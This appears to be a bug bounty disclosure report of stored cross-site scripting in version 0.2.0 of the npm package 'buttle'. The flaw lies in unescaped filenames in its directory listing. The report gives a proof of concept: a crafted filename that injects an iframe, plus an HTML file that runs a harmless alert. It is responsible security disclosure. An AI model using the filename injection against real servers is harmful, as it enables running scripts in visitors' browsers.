I would like to report HTML Injection in buttle module.
Due to lack of filenames sanitization, it is possible to inject malicious iframe
tag via filename and execute arbitray JavaScript code.
module name: buttleversion:0.2.0npm page: https://www.npmjs.com/package/buttle
Simple static file (+ markdown) server.
Stats:
N/A, estimated ~20-40 downloads/week
When buttle
displays directory index in the browser, it uses directory.js
middleware from connect
module to create an output with HTML. Because methods to escape user output used in this middleware are not sufficient enough (it’s actually quite outdated version of connect
), it is possible to inject iframe
tag with src
attribute set to arbitrary HTML file, which can contain any executable JavaScript code.
buttle
:$ npm i buttle
create file with the following name: "><iframe src="malware_frame.html">
create malwrae_frame.html
file with following content:
<html>
<head>
<meta charset="utf8" />
<title>Frame embeded with malware :P</title>
</head>
<body>
<p>iframe element with malicious code</p>
<script>
alert('Uh oh, I am bad, bad malware!!!')
</script>
</body>
</html>
$ ./node_modules/buttle/bin/buttle -p 8080
Listening on port 8080
http://localhost:8080
You see JavaScript from malware_frame.html
executed immediately:
{F279830}
Probably updating all dependiences is a good solution.
I hope my report will help to keep Node.js ecosystem and its users safe :)
Regards,
Rafal ‘bl4de’ Janicki
An attacker is able to execute arbitrary JavaScript code in user’s browser
The hacker selected the Cross-site Scripting (XSS) - Stored weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:
Verified
Yes